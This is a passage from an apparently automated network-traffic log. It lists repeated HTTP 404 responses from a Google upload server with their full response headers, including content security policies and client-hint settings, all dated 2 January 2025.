ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7DTrgUj-SUL1WLFTQNp3WIdc1-af3V1miTmlaH9lkVp9VuRkeu4YRsEJ5N8bs_cvwI0sXQQooContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:05 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-JzoAc3I9O8u3VpNrDtQjYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4u3qQ3HfS40Bb9hR1unAuAxdVkripQx6l-j5a16bqwiuzKztcC6uruaXTz0nCr3LkXContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:05 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-6ksq4j7bcLz06X8RYt1J6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7GVtHhSxq5SMMMO-1cJ72ZKbCrCK1u1eDY5qY9pzk4q5Noi0wL_8VjY6-uzRUBo8B9Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:08 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Boaj8ctGenao6Vnr65Ygqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4ooxedmOwarrBlY25meNQxUNV14JlLQws75zMRiJ-XR1q1a1ALJVIv4iY_W1nD9Eo_Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:08 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-jc1K7EDbyF-CMTl1UuO1AQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5XfE6c6FWbYbcaYsE8CII7WTQSZH2UxQzlvQ_tXptvVMj6gezsk38K5D1lgTYuwnr5Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:09 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-pW_mcY9mSJ_58K7k28Cvnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4l_FiJWpXy3qHDpBtZAln25MYIPR2cz1tydI6O220s7gBclzHO2lSwgoFyOkgci7w1Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:09 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-lPIFVudLxMtgRIY_5GGbvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6qePi-oNze6j1Xb_QyJsI6KpyE0Fak2MtcHZluM_W9eh5BYANf72cPDvNbaeufpV1CwZtHQ10Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:11 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-E3_V1hM7IuPwFCGai82noA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7DS_pHNYbhiBmxstMpCPpvzFoM6kpqEQGkBG5O_lHLh99iab6ZzyBxpR2Quj7UNVZryCjR_ekContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:12 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-YU-niXs69C82prCCCLdRLA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4vwLKGqCv7KQyhZJuzo6XrrumCEFoJ3lv6IHe-K1YjJwEgSdvwM5JoYHt6lmKS1Ja6lXpSXIYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:12 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-bmoHyBlJIsDv8-RX3CMxNQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5-aRwqRjZQYgC0cilP-45WGa1E-BQ1MIyMi7Swbm4x97l_PFxy9v-haiGYCp6fjVKVbw7UAeQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:16 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-o6J4vcjE0xr1j0J33dIhDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4OYYUwQEUEwxsMVIap11AW8jo9_eH5SVpNXezkBVUVFASN8D43YAU5gqh2ALRWYpseContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:16 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-1FYnJ68lbdA4fyaXAmeNHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC45TP5API_KuVzuaa0nQtY-2iGr67v5evb1lZlPojpY9CGpaDSlE02H_G9fqAN00SEsqFVoqTcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:17 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-C1uTYRIi_wRlxx44QYyFaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5UPOLAyyGVHB_Jg9r5T44xPn4_tiNj49FQzMruobX7Rk04jt-tLVzUTrbJILujoIDuContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:17 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ASsSPAv3a7LYEnm171xGcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6rRixsXqRdKtI6V-8xHAHDegiAFV_lbMT_CoPS2__CifoQHiNyq-JCg8wBS2DvdzgGpvUoCw0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:20 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-MoA5Z0TPY8kSdC5PKgDZcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5yHLV0dRQ955kHixB6pM-zja66B9bHv6XqMiW_LTjrpqQ0EG-m1y7H3Otu8xCUe--eSP5yqFoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:20 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-yP9Iw9b0d1tXycBgwAl0Gw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6UESL7_ngE9-XEMPc9saozz4sYjxyg8luQAkMgKlJc6rwMhaGFJqcsjp-Mvkbm9gkpWFIHOt8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:21 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-yJP3YN7kj7PHVPpeWQc6fw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7_YBKVFDcScWGLRFpUcPWcR5Evw8_MYK8Pzgmqpsy1Drxb40yvOYcx0WizVSrM8-1oContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:21 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce--3PEpwT8x_P87-faJTPaew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5qKbUWqEjAv_2QWoAgqyLPY5AEqBBiMu4H7NXcKArSxlunctDSp-D289QVkQVKR-wpContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:23 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-6iAdYXwOHgzDW6ZUyMZVWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4EKrRzDC6V7XZ2kaAd8tKUDWdQ9C_H3aMNN5KyhSYg3iypqV1Bxsus55zEe2mDX-f3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:24 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-0bNmzfulS7w6-WAGh6lgDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4O8GMataXfOiOZy6yD4fnVvrv013mD7qWpJP_Skj3VpArmB1sks3gMRhEcNEpzqyIIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:24 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-3RlGUm-_RgE7R4gc7J5u5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 